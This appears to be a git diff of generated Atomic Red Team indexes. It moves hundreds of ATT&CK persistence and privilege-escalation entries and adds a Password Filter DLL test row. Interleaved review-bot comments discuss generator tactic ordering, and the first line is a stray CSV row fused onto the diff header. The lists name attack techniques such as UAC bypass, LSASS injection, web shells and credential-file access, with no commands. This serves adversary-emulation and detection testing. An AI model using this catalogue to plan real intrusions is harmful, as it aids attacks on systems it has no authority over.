execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d9ef501a..766fe117 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
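Review bot: this hunk is the persistence half of the move begun at the top of the file: all 21 persistence rows removed there come back here between the discovery and execution rows, GUIDs and executors unchanged, with the same two renames (`RC Scripts`, `Unix Shell Configuration Modification`). The point to check is the tactic order the generator now produces. Privilege-escalation landed after collection and persistence after discovery, while the unchanged context shows credential-access, defense-evasion, discovery and execution keeping their places; if that order comes from iterating an unordered map rather than a fixed tactic list, the next regeneration will churn the same hundreds of lines again and make real changes to these indexes invisible in review. Pinning a fixed tactic order in the generator would fix this.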
@@ -371,6 +371,7 @@ persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d- persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt +persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c6241700..96704302 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
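Review bot: the new row `persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell` sits correctly in name order between `Outlook Home Page` and `Path Interception by Unquoted Path`, but it appears only under the persistence tactic in this hunk. T1556.002 is a Modify Authentication Process sub-technique, which ATT&CK also maps to credential-access and defense-evasion, and these indexes emit one row per tactic for multi-tactic techniques (the Cron and Trap rows in the earlier hunks appear under both privilege-escalation and persistence, and Cron again under execution). Check that matching credential-access and defense-evasion rows for this test were generated elsewhere in windows-index.csv; if not, the tactic list in the atomic's YAML is probably incomplete and should be fixed there so the generated indexes, matrices and navigator layers all pick it up.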
@@ -1,391 +1,4 @@ # All Atomic Tests by ATT&CK Tactic & Technique -# privilege-escalation -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] - - Atomic Test #2: Replace binary of sticky keys [windows] -- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - - Atomic Test #1: Install AppInit Shim [windows] -- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md) - - Atomic Test #1: Application Shim Installation [windows] - - Atomic Test #2: New shim database files created in the default shim database directory [windows] - - Atomic Test #3: Registry key creation and/or modification events for SDB [windows] -- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md) - - Atomic Test #1: Process Injection via C# [windows] -- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - - Atomic Test #1: At - Schedule a job [linux] -- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) - - Atomic Test #1: At.exe Scheduled task [windows] -- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] - - 
Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] - - Atomic Test #3: Bypass UAC using Fodhelper [windows] - - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - - Atomic Test #8: Disable UAC using reg.exe [windows] -- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - - Atomic Test #1: User scope COR_PROFILER [windows] - - Atomic Test #2: System Scope COR_PROFILER [windows] - - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] -- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - - Atomic Test #1: Change Default File Association [windows] -- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] -- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) - - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] -- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] -- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] -- T1078.002 Domain Accounts 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - - Atomic Test #1: Process Injection via mavinject.exe [windows] -- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.014 Emond](../../T1546.014/T1546.014.md) - - Atomic Test #1: Persistance with Event Monitor - emond [macos] -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) - - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO Global Flags [windows] -- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) - - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] -- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] -- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) - - Atomic Test #1: Launch Agent [macos] -- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) - - Atomic Test #1: 
Launch Daemon [macos] -- [T1053.004 Launchd](../../T1053.004/T1053.004.md) - - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) - - Atomic Test #1: Create local account with admin priviliges [windows] -- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - - Atomic Test #1: Logon Scripts - Mac [macos] -- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - - Atomic Test #1: Logon Scripts [windows] -- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) - - Atomic Test #1: Netsh Helper DLL Registration [windows] -- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] - - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] - - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] - - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] - - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] -- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] -- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - - Atomic Test #1: Plist Modification [macos] -- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) - - Atomic Test #1: Add Port Monitor persistence in Registry [windows] -- T1055.002 
Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - - Atomic Test #1: Append malicious start-process cmdlet [windows] -- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md) - - Atomic Test #1: Process Hollowing using PowerShell [windows] - - Atomic Test #2: RunPE via VBA [windows] -- [T1055 Process Injection](../../T1055/T1055.md) - - Atomic Test #1: Shellcode execution via VBA [windows] - - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] -- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - - Atomic Test #1: rc.common [macos] -- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - - Atomic Test #1: Re-Opened Applications [macos] - - Atomic Test #2: Re-Opened Applications [macos] -- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - - Atomic Test #1: Reg Key Run [windows] - - Atomic Test #2: Reg Key RunOnce [windows] - - Atomic Test #3: PowerShell Registry RunOnce [windows] - - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] - - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] -- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - - Atomic Test #1: Scheduled Task Startup Script [windows] - - Atomic Test #2: Scheduled task Local [windows] - - 
Atomic Test #3: Scheduled task Remote [windows] - - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] - - Atomic Test #5: Task Scheduler via VBA [windows] - - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.002 Screensaver](../../T1546.002/T1546.002.md) - - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] -- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md) - - Atomic Test #1: Modify SSP configuration in registry [windows] -- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - - Atomic Test #1: Service Registry Permissions Weakness [windows] - - Atomic Test #2: Service ImagePath Change with reg.exe [windows] -- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Set a SetUID flag on file [macos, linux] - - Atomic Test #3: Set a SetGID flag on file [macos, linux] -- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - - Atomic Test #1: Shortcut Modification [windows] - - Atomic Test #2: Create shortcut to cmd in startup folders [windows] -- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) - - Atomic Test #1: Add file to Local Library StartupItems [macos] -- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] -- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - - Atomic Test #1: Create Systemd Service [linux] -- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - - Atomic Test #1: Create Systemd Service and Timer [linux] -- T1055.003 Thread Execution 
Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md) - - Atomic Test #1: Named pipe client impersonation [windows] - - Atomic Test #2: `SeDebugPrivilege` token duplication [windows] -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) - - Atomic Test #1: Persistence via WMI Event Subscription [windows] -- [T1543.003 Windows Service](../../T1543.003/T1543.003.md) - - Atomic Test #1: Modify Fax service to run PowerShell [windows] - - Atomic Test #2: Service Installation CMD [windows] - - Atomic Test #3: Service Installation PowerShell [windows] -- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] - - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] - -# persistence -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] - - Atomic Test #2: Replace binary of sticky keys [windows] -- [T1098 Account Manipulation](../../T1098/T1098.md) - - Atomic Test #1: Admin Account Manipulate [windows] - - Atomic Test #2: Domain Account 
and Group Manipulate [windows] -- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - - Atomic Test #1: Install AppInit Shim [windows] -- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md) - - Atomic Test #1: Application Shim Installation [windows] - - Atomic Test #2: New shim database files created in the default shim database directory [windows] - - Atomic Test #3: Registry key creation and/or modification events for SDB [windows] -- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - - Atomic Test #1: At - Schedule a job [linux] -- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) - - Atomic Test #1: At.exe Scheduled task [windows] -- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1197 BITS Jobs](../../T1197/T1197.md) - - Atomic Test #1: Bitsadmin Download (cmd) [windows] - - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - - Atomic Test #3: Persist, Download, & Execute [windows] - - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - - Atomic Test #3: Firefox [linux, windows, macos] - - Atomic Test #4: Edge 
Chromium Addon - VPN [windows, macos] -- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - - Atomic Test #1: User scope COR_PROFILER [windows] - - Atomic Test #2: System Scope COR_PROFILER [windows] - - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] -- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - - Atomic Test #1: Change Default File Association [windows] -- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] -- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) - - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] -- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] -- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] -- [T1136.002 Domain Account](../../T1136.002/T1136.002.md) - - Atomic Test #1: Create a new Windows domain admin user [windows] - - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON 
[windows] - - Atomic Test #3: Create a new Domain Account using PowerShell [windows] -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.014 Emond](../../T1546.014/T1546.014.md) - - Atomic Test #1: Persistance with Event Monitor - emond [macos] -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1133 External Remote Services](../../T1133/T1133.md) - - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) - - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO Global Flags [windows] -- T1525 Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) - - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] -- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] -- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) - - Atomic Test #1: Launch Agent [macos] -- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) - - Atomic Test #1: Launch 
Daemon [macos] -- [T1053.004 Launchd](../../T1053.004/T1053.004.md) - - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- [T1136.001 Local Account](../../T1136.001/T1136.001.md) - - Atomic Test #1: Create a user account on a Linux system [linux] - - Atomic Test #2: Create a user account on a MacOS system [macos] - - Atomic Test #3: Create a new user in a command prompt [windows] - - Atomic Test #4: Create a new user in PowerShell [windows] - - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] - - Atomic Test #6: Create a new Windows admin user [windows] -- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) - - Atomic Test #1: Create local account with admin priviliges [windows] -- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - - Atomic Test #1: Logon Scripts - Mac [macos] -- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - - Atomic Test #1: Logon Scripts [windows] -- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) - - Atomic Test #1: Netsh Helper DLL Registration [windows] -- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1137 Office Application Startup](../../T1137/T1137.md) - - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows] -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1137.002 Office Test](../../T1137.002/T1137.002.md) - - Atomic Test #1: Office Application Startup Test Persistence [windows] -- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - - Atomic Test #1: Install Outlook Home Page Persistence [windows] -- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) -- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] -- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - - Atomic Test #1: Plist Modification [macos] -- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) - - Atomic Test #1: Add Port Monitor persistence in Registry [windows] -- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - - Atomic Test #1: Append malicious start-process cmdlet [windows] -- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - - Atomic Test #1: rc.common [macos] -- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - - Atomic Test #1: Re-Opened Applications [macos] - - Atomic Test #2: Re-Opened Applications [macos] -- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - - Atomic Test #1: Reg Key Run [windows] - - Atomic Test #2: Reg Key RunOnce [windows] - - Atomic Test #3: PowerShell Registry RunOnce [windows] - - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] - - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] -- T1505.001 SQL Stored Procedures [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) -- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] -- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - - Atomic Test #1: Scheduled Task Startup Script [windows] - - Atomic Test #2: Scheduled task Local [windows] - - Atomic Test #3: Scheduled task Remote [windows] - - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] - - Atomic Test #5: Task Scheduler via VBA [windows] - - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.002 Screensaver](../../T1546.002/T1546.002.md) - - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] -- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md) - - Atomic Test #1: Modify SSP configuration in registry [windows] -- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - - Atomic Test #1: Service Registry Permissions Weakness [windows] - - Atomic Test #2: Service ImagePath Change with reg.exe [windows] -- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - - Atomic Test #1: Shortcut Modification [windows] - - Atomic Test #2: Create shortcut to cmd in startup folders [windows] -- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) - - Atomic Test #1: Add file to Local Library StartupItems [macos] -- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - - Atomic Test #1: Create Systemd Service [linux] -- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - - Atomic Test #1: Create Systemd Service and Timer [linux] -- T1542.005 
TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md) - - Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows] -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1505.003 Web Shell](../../T1505.003/T1505.003.md) - - Atomic Test #1: Web Shell Written to Disk [windows] -- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) - - Atomic Test #1: Persistence via WMI Event Subscription [windows] -- [T1543.003 Windows Service](../../T1543.003/T1543.003.md) - - Atomic Test #1: Modify Fax service to run PowerShell [windows] - - Atomic Test #2: Service Installation CMD [windows] - - Atomic Test #3: Service Installation PowerShell [windows] -- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] - - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] - # credential-access - [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] 
